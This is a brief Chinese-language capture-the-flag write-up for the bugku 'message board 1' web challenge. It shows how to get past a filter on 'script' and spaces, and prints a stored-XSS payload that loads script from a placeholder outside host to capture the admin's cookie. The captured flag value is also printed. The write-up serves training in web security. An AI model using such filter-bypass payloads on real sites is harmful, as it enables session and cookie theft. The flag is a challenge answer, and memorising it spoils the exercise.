文章

bugku WEB 留言板1

发表于 更新于
作者 lmds
1 分钟阅读

在xss.pt 注册一个账号,配置XSS

img

img

我们复制srcipt这一条

1

<sCRiPt sRC=//xx.xx/xxxx></sCrIpT>

我们会发现过滤了script和空格,进行其他代码尝试,会发现 ( ) 括号也进行了过滤

我们有大小写+双写可以过滤srcipt,空格使用反斜杠进行绕过

1

<sCRisCRiPtPt/sRC=//xx.xx/xxxx></sCrsCrIpTIpT>

测试情况

img

img

flag=flag%7B3f82f0d1288d080024d1ee51d4499228%7D;

flag{3f82f0d1288d080024d1ee51d4499228}

CTF, WEB
web bugku
本文由作者按照 CC BY 4.0 进行授权